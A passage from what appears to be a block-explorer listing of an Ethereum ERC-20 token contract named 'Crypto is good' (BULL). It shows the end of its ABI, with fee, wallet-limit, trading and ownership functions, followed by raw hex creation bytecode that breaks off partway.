],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"updAds","type":"address"},{"internalType":"bool","name":"isEx","type":"bool"}],"name":"excludeFromMaxTransaction","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"limitsInEffect","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"marketingWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxTransactionAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sellDevFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellLiquidityFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellMarketingFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellTotalFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"swapEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"swapTokensAtAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForDev","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForLiquidity","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForMarketing","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tradingActive","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"withdrawStuckEth","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]
Contract Creation Code
60c06040526001600b5f6101000a81548160ff0219169083151502179055505f600b60016101000a81548160ff0219169083151502179055505f600b60026101000a81548160ff02191690831515021790555034801561005d575f80fd5b506040518060400160405280600e81526020017f43727970746f20697320676f6f640000000000000000000000000000000000008152506040518060400160405280600481526020017f42554c4c0000000000000000000000000000000000000000000000000000000081525081600390816100d99190610ea9565b5080600490816100e99190610ea9565b5050505f6100fb6105fb60201b60201c565b90508060055f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508073ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3505f737a250d5630b4cf539739df2c5dacb4c659f2488d905073bdebd22634dacbc7ae10ad70c6f829f79176cb8960065f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055503360075f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555061025581600161060260201b60201c565b8073ffffffffffffffffffffffffffffffffffffffff1660808173ffffffffffffffffffffffffffffffffffffffff16815250505f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690505f8273ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa1580156102f8573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061031c9190610fd6565b73ffffffffffffffffffffffffffffffffffffffff1663c9c65396308573ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610381573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906103a59190610fd6565b6040518363ffffffff1660e01b81526004016103c2929190611010565b6020604051808303815f875af11580156103de573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906104029190610fd6565b90508073ffffffffffffffffffffffffffffffffffffffff1660a08173ffffffffffffffffffffffffffffffffffffffff168152505061044b60a051600161060260201b60201c565b61045e60a05160016106f660201b60201c565b61046e818361079460201b60201c565b5f600590505f805f600f90505f805f67016345785d8a000090506103e86014826104989190611064565b6104a291906110d2565b6008819055506103e86014826104b89190611064565b6104c291906110d2565b600a819055506127106005826104d89190611064565b6104e291906110d2565b60098190555086600d8190555085600e8190555084600f81905550600f54600e54600d546105109190611102565b61051a9190611102565b600c819055508360118190555082601281905550816013819055506013546012546011546105489190611102565b6105529190611102565b60108190555061057661056961091160201b60201c565b600161093960201b60201c565b61058730600161093960201b60201c565b61059a61dead600161093960201b60201c565b6105b86105ab61091160201b60201c565b600161060260201b60201c565b6105c930600161060260201b60201c565b6105dc61dead600161060260201b60201c565b6105ec3082610a7b60201b60201c565b505050505050505050506113f4565b5f33905090565b6106106105fb60201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1660055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461069e576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016106959061118f565b60405180910390fd5b8060185f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055505050565b8060195f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055508015158273ffffffffffffffffffffffffffffffffffffffff167fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab60405160405180910390a35050565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610802576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107f99061121d565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610870576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610867906112ab565b60405180910390fd5b7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505050565b5f60055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6109476105fb60201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1660055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146109d5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109cc9061118f565b60405180910390fd5b8060175f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df782604051610a6f91906112e3565b60405180910390a25050565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610ae9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ae090611346565b60405180910390fd5b610afa5f8383610c0d60201b60201c565b610b0f81600254610c1260201b90919060201c565b600281905550610b64815f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054610c1260201b90919060201c565b5f808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610c019190611373565b60405180910390a35050565b505050565b5f808284610c209190611102565b905083811015610c65576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c5c906113d6565b60405180910390fd5b8091505092915050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f6002820490506001821680610cea57607f821691505b602082108103610cfd57610cfc610ca6565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f60088302610d5f7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82610d24565b610d698683610d24565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f610dad610da8610da384610d81565b610d8a565b610d81565b9050919050565b5f819050919050565b610dc683610d93565b610dda610dd282610db4565b848454610d30565b825550505050565b5f90565b610dee610de2565b610df9818484610dbd565b505050565b5b81811015610e1c57610e115f82610de6565b600181019050610dff565b5050565b601f821115610e6157610e3281610d03565b610e3b84610d15565b81016020851015610e4a578190505b610e5e610e5685610d15565b830182610dfe565b50505b505050565b5f82821c905092915050565b5f610e815f1984600802610e66565b1980831691505092915050565b5f610e998383610e72565b9150826002028217905092915050565b610eb282610c6f565b67ffffffffffffffff811115610ecb57610eca610c79565b5b610ed58254610cd3565b610ee0828285610e20565b5f60209050601f831160018114610f11575f8415610eff578287015190505b610f098582610e8e565b865550610f70565b601f198416610f1f86610d03565b5f5b82811015610f4657848901518255600182019150602085019450602081019050610f21565b86831015610f635784890151610f5f601f891682610e72565b8355505b6001600288020188555050505b505050505050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f610fa582610f7c565b9050919050565b610fb581610f9b565b8114610fbf575f80fd5b50565b5f81519050610fd081610fac565b92915050565b5f60208284031215610feb57610fea610f78565b5b5f610ff884828501610fc2565b91505092915050565b61100a81610f9b565b82525050565b5f6040820190506110235f830185611001565b6110306020830184611001565b9392505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f61106e82610d81565b915061107983610d81565b925082820261108781610d81565b9150828204841483151761109e5761109d611037565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f6110dc82610d81565b91506110e783610d81565b9250826110f7576110f66110a5565b5b828204905092915050565b5f61110c82610d81565b915061111783610d81565b925082820190508082111561112f5761112e611037565b5b92915050565b5f82825260208201905092915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f611179602083611135565b915061118482611145565b602082019050919050565b5f6020820190508181035f8301526111a68161116d565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f611207602483611135565b9150611212826111ad565b604082019050919050565b5f6020820190508181035f830152611234816111fb565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f611295602283611135565b91506112a08261123b565b604082019050919050565b5f6020820190508181035f8301526112c281611289565b9050919050565b5f8115159050919050565b6112dd816112c9565b82525050565b5f6020820190506112f65f8301846112d4565b92915050565b7f45524332303a206d696e7420746f20746865207a65726f2061646472657373005f82015250565b5f611330601f83611135565b915061133b826112fc565b602082019050919050565b5f6020820190508181035f83015261135d81611324565b9050919050565b61136d81610d81565b82525050565b5f6020820190506113865f830184611364565b92915050565b7f536166654d6174683a206164646974696f6e206f766572666c6f7700000000005f82015250565b5f6113c0601b83611135565b91506113cb8261138c565b602082019050919050565b5f6020820190508181035f8301526113ed816113b4565b9050919050565b60805160a051613bc46114385f395f610c3201525f8181610a6f015281816111d1015281816111f901528181612a6701528181612b460152612b6d0152613bc45ff3fe608060405260043610610254575f3560e01c80638a8c523c11610138578063b62496f5116100b5578063dd62ed3e11610079578063dd62ed3e14610897578063e2f45605146108d3578063f11a24d3146108fd578063f2fde38b14610927578063f63743421461094f578063f8b45b05146109795761025b565b8063b62496f5146107b5578063bbc0c742146107f1578063c02466681461081b578063c8c8ebe414610843578063d85ba0631461086d5761025b565b80639c3b4fdc116100fc5780639c3b4fdc146106bf5780639fccce32146106e9578063a0d82dc514610713578063a457c2d71461073d578063a9059cbb146107795761025b565b80638a8c523c146106015780638da5cb5b146106175780638ea5220f14610641578063921369131461066b57806395d89b41146106955761025b565b806349bd5a5e116101d1578063715018a611610195578063715018a61461052f578063751039fc146105455780637571336a1461056f57806375f0a874146105975780637bce5a04146105c15780637fa787ba146105eb5761025b565b806349bd5a5e1461044b5780634a62bb65146104755780636a486a8e1461049f5780636ddd1713146104c957806370a08231146104f35761025b565b80631a8145bb116102185780631a8145bb146103555780631f3fed8f1461037f57806323b872dd146103a9578063313ce567146103e5578063395093511461040f5761025b565b806306fdde031461025f578063095ea7b31461028957806310d5de53146102c55780631694505e1461030157806318160ddd1461032b5761025b565b3661025b57005b5f80fd5b34801561026a575f80fd5b506102736109a3565b6040516102809190612cce565b60405180910390f35b348015610294575f80fd5b506102af60048036038101906102aa9190612d7f565b610a33565b6040516102bc9190612dd7565b60405180910390f35b3480156102d0575f80fd5b506102eb60048036038101906102e69190612df0565b610a50565b6040516102f89190612dd7565b60405180910390f35b34801561030c575f80fd5b50610315610a6d565b6040516103229190612e76565b60405180910390f35b348015610336575f80fd5b5061033f610a91565b60405161034c9190612e9e565b60405180910390f35b348015610360575f80fd5b50610369610a9a565b6040516103769190612e9e565b60405180910390f35b34801561038a575f80fd5b50610393610aa0565b6040516103a09190612e9e565b60405180910390f35b3480156103b4575f80fd5b506103cf60048036038101906103ca9190612eb7565b610aa6565b6040516103dc9190612dd7565b60405180910390f35b3480156103f0575f80fd5b506103f9610b7a565b6040516104069190612f22565b60405180910390f35b34801561041a575f80fd5b5061043560048036038101906104309190612d7f565b610b82565b6040516104429190612dd7565b60405180910390f35b348015610456575f80fd5b5061045f610c30565b60405161046c9190612f4a565b60405180910390f35b348015610480575f80fd5b50610489610c54565b6040516104969190612dd7565b60405180910390f35b3480156104aa575f80fd5b506104b3610c66565b6040516104c09190612e9e565b60405180910390f35b3480156104d4575f80fd5b506104dd610c6c565b6040516104ea9190612dd7565b60405180910390f35b3480156104fe575f80fd5b5061051960048036038101906105149190612df0565b610c7f565b6040516105269190612e9e565b60405180910390f35b34801561053a575f80fd5b50610543610cc4565b005b348015610550575f80fd5b50610559610e17565b6040516105669190612dd7565b60405180910390f35b34801561057a575f80fd5b5061059560048036038101906105909190612f8d565b610f06565b005b3480156105a2575f80fd5b506105ab610ff4565b6040516105b89190612f4a565b60405180910390f35b3480156105cc575f80fd5b506105d5611019565b6040516105e29190612e9e565b60405180910390f35b3480156105f6575f80fd5b506105ff61101f565b005b34801561060c575f80fd5b506106156110e5565b005b348015610622575f80fd5b5061062b6112e6565b6040516106389190612f4a565b60405180910390f35b34801561064c575f80fd5b5061065561130e565b6040516106629190612f4a565b60405180910390f35b348015610676575f80fd5b5061067f611333565b60405161068c9190612e9e565b60405180910390f35b3480156106a0575f80fd5b506106a9611339565b6040516106b69190612cce565b60405180910390f35b3480156106ca575f80fd5b506106d36113c9565b6040516106e09190612e9e565b60405180910390f35b3480156106f4575f80fd5b506106fd6113cf565b60405161070a9190612e9e565b60405180910390f35b34801561071e575f80fd5b506107276113d5565b6040516107349190612e9e565b60405180910390f35b348015610748575f80fd5b50610763600480360381019061075e9190612d7f565b6113db565b6040516107709190612dd7565b60405180910390f35b348015610784575f80fd5b5061079f600480360381019061079a9190612d7f565b6114a3565b6040516107ac9190612dd7565b60405180910390f35b3480156107c0575f80fd5b506107db60048036038101906107d69190612df0565b6114c0565b6040516107e89190612dd7565b60405180910390f35b3480156107fc575f80fd5b506108056114dd565b6040516108129190612dd7565b60405180910390f35b348015610826575f80fd5b50610841600480360381019061083c9190612f8d565b6114f0565b005b34801561084e575f80fd5b5061085761162c565b6040516108649190612e9e565b60405180910390f35b348015610878575f80fd5b50610881611632565b60405161088e9190612e9e565b60405180910390f35b3480156108a2575f80fd5b506108bd60048036038101906108b89190612fcb565b611638565b6040516108ca9190612e9e565b60405180910390f35b3480156108de575f80fd5b506108e76116ba565b6040516108f49190612e9e565b60405180910390f35b348015610908575f80fd5b506109116116c0565b60405161091e9190612e9e565b60405180910390f35b348015610932575f80fd5b5061094d60048036038101906109489190612df0565b6116c6565b005b34801561095a575f80fd5b50610963611888565b6040516109709190612e9e565b60405180910390f35b348015610984575f80fd5b5061098d61188e565b60405161099a9190612e9e565b60405180910390f35b6060600380546109b290613036565b80601f01602080910402602001604051908101604052809291908181526020018280546109de90613036565b8015610a295780601f10610a0057610100808354040283529160200191610a29565b820191905f5260205f20905b815481529060010190602001808311610a0c57829003601f168201915b5050505050905090565b5f610a46610a3f611894565b848461189b565b6001905092915050565b6018602052805f5260405f205f915054906101000a900460ff1681565b7f000000000000000000000000000000000000000000000000000000000000000081565b5f600254905090565b60155481565b60145481565b5f610ab2848484611a5e565b610b6f84610abe611894565b610b6a85604051806060016040528060288152602001613b426028913960015f8b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f610b21611894565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546124ed9092919063ffffffff16565b61189b565b600190509392505050565b5f6009905090565b5f610c26610b8e611894565b84610c218560015f610b9e611894565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461254f90919063ffffffff16565b61189b565b6001905092915050565b7f000000000000000000000000000000000000000000000000000000000000000081565b600b5f9054906101000a900460ff1681565b60105481565b600b60029054906101000a900460ff1681565b5f805f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b610ccc611894565b73ffffffffffffffffffffffffffffffffffffffff1660055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610d5a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d51906130b0565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff1660055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35f60055f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b5f610e20611894565b73ffffffffffffffffffffffffffffffffffffffff1660055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610eae576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ea5906130b0565b60405180910390fd5b5f600b5f6101000a81548160ff0219169083151502179055505f600c819055505f600d819055505f600e819055505f600f819055505f6010819055505f6011819055505f6012819055505f6013819055506001905090565b610f0e611894565b73ffffffffffffffffffffffffffffffffffffffff1660055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610f9c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f93906130b0565b60405180910390fd5b8060185f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055505050565b60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b600d5481565b6110276112e6565b73ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff161461105d575f80fd5b5f471161109f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161109690613118565b60405180910390fd5b3373ffffffffffffffffffffffffffffffffffffffff166108fc4790811502906040515f60405180830381858888f193505050501580156110e2573d5f803e3d5ffd5b50565b6110ed611894565b73ffffffffffffffffffffffffffffffffffffffff1660055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461117b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611172906130b0565b60405180910390fd5b600b60019054906101000a900460ff16156111cb576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111c290613180565b60405180910390fd5b6111f7307f00000000000000000000000000000000000000000000000000000000000000005f1961189b565b7f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663f305d719473061123e30610c7f565b5f806112486112e6565b426040518863ffffffff1660e01b815260040161126a969594939291906131d7565b60606040518083038185885af1158015611286573d5f803e3d5ffd5b50505050506040513d601f19601f820116820180604052508101906112ab919061324a565b5050506001600b60016101000a81548160ff0219169083151502179055506001600b60026101000a81548160ff021916908315150217905550565b5f60055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60115481565b60606004805461134890613036565b80601f016020809104026020016040519081016040528092919081815260200182805461137490613036565b80156113bf5780601f10611396576101008083540402835291602001916113bf565b820191905f5260205f20905b8154815290600101906020018083116113a257829003601f168201915b5050505050905090565b600f5481565b60165481565b60135481565b5f6114996113e7611894565b8461149485604051806060016040528060258152602001613b6a6025913960015f611410611894565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546124ed9092919063ffffffff16565b61189b565b6001905092915050565b5f6114b66114af611894565b8484611a5e565b6001905092915050565b6019602052805f5260405f205f915054906101000a900460ff1681565b600b60019054906101000a900460ff1681565b6114f8611894565b73ffffffffffffffffffffffffffffffffffffffff1660055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611586576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161157d906130b0565b60405180910390fd5b8060175f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7826040516116209190612dd7565b60405180910390a25050565b60085481565b600c5481565b5f60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b60095481565b600e5481565b6116ce611894565b73ffffffffffffffffffffffffffffffffffffffff1660055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461175c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611753906130b0565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036117ca576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016117c19061330a565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff1660055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a38060055f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b60125481565b600a5481565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611909576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161190090613398565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611977576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161196e90613426565b60405180910390fd5b8060015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051611a519190612e9e565b60405180910390a3505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611acc576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ac3906134b4565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611b3a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b3190613542565b60405180910390fd5b5f8103611b5157611b4c83835f6125ac565b6124e8565b600b5f9054906101000a900460ff161561203557611b6d6112e6565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614158015611bdb5750611bab6112e6565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015611c1357505f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015611c4d575061dead73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015611c665750600560149054906101000a900460ff16155b1561203457600b60019054906101000a900460ff16611d5a5760175f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1680611d1a575060175f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b611d59576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d50906135aa565b60405180910390fd5b5b60195f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff168015611df7575060185f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b15611e9e57600854811115611e41576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611e3890613638565b60405180910390fd5b600a54611e4d83610c7f565b82611e589190613683565b1115611e99576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611e9090613700565b60405180910390fd5b612033565b60195f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff168015611f3b575060185f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b15611f8a57600854811115611f85576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611f7c9061378e565b60405180910390fd5b612032565b60185f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1661203157600a54611fe483610c7f565b82611fef9190613683565b1115612030576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161202790613700565b60405180910390fd5b5b5b5b5b5b5f61203f30610c7f565b90505f8082101590508080156120615750600b60029054906101000a900460ff165b801561207a5750600560149054906101000a900460ff16155b80156120cd575060195f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b8015612120575060175f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b8015612173575060175f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b156121b7576001600560146101000a81548160ff02191690831515021790555061219c83612835565b5f600560146101000a81548160ff0219169083151502179055505b5f600560149054906101000a900460ff1615905060175f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffff